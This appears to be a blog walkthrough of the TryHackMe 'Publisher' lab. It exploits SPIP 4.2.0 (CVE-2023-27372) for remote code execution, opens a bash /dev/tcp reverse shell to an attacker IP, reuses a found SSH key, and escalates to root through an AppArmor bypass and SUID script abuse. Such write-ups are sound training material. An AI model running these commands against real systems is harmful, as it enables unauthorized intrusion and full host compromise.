Post

Publisher - TryHackMe Walkthrough

Posted
Publisher Room Banner
Publisher Room Banner
By Ahmed1
1 min read
Publisher - TryHackMe Walkthrough

Publisher - TryHackMe Walkthrough

Enumeration

Nmap Scan

We start with a comprehensive nmap scan:

1

sudo nmap -sC -sV -T4 {target_IP}

The scan reveals two open ports:

  • Port 22: OpenSSH 8.2p1 Ubuntu
  • Port 80: Apache httpd 2.4.41

Web Enumeration

The website appears to be a simple blog with no obvious functionality. Running a directory scan with feroxbuster reveals the /spip path.

Publisher Homepage

Using Wappalyzer, we identify that the site is running SPIP version 4.2.0.

SPIP Version

Initial Access

Research reveals that SPIP 4.2.0 is vulnerable to Unauthenticated Remote Code Execution (CVE-2023-27372). We can exploit this using a publicly available exploit:

1
2
3

git clone https://github.com/Chocapikk/CVE-2023-27372.git
pip install -r requirements.txt
python CVE-2023-27372.py -u http://{target_IP}/spip/ -v -o report.txt

RCE Success

Getting a Reverse Shell

We establish a reverse shell using:

1

bash -c "bash -i >& /dev/tcp/{attacker_IP}/9001 0>&1"

Reverse Shell

Lateral Movement

We discover we’re in a Docker container. Manual enumeration reveals an SSH private key in the think user’s home directory:

SSH Key

We can use this key to gain SSH access as the think user:

1

ssh -i id_rsa think@{target_IP}

Privilege Escalation

Method 1: AppArmor Bypass

We discover AppArmor is running, which restricts file operations. After analyzing the AppArmor rules, we find we can write to /dev/shm:

1
2
3
4
5
6
7

echo '#!/usr/bin/perl
use POSIX qw(strftime);
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/sh"' > /dev/shm/test.pl
chmod +x /dev/shm/test.pl
./test.pl

Method 2: SUID Binary Exploitation

We find a SUID binary /usr/sbin/run_container that executes /opt/run_container.sh. Since we have write permissions to this script, we can modify it to add SUID to /bin/bash:

1
2
3

echo 'chmod +s /bin/bash' > /opt/run_container.sh
/usr/sbin/run_container
/bin/bash -p

Root Access

Alternative Method

From the www-data shell, we can:

  1. Copy /bin/bash to /home/think/spip
  2. Set SUID bit
  3. Make it readable by everyone
  4. Execute it from the SSH session

Conclusion

This machine demonstrates several important security concepts:

  • Web application vulnerabilities (SPIP RCE)
  • Docker container escape
  • AppArmor bypass techniques
  • SUID binary exploitation
  • Multiple privilege escalation paths

Remember: Always look for multiple ways to achieve your goal, as there might be more than one path to success.

TryHackMe, Web Exploitation
web spip rce docker privilege-escalation tryhackme
This post is licensed under CC BY 4.0 by the author.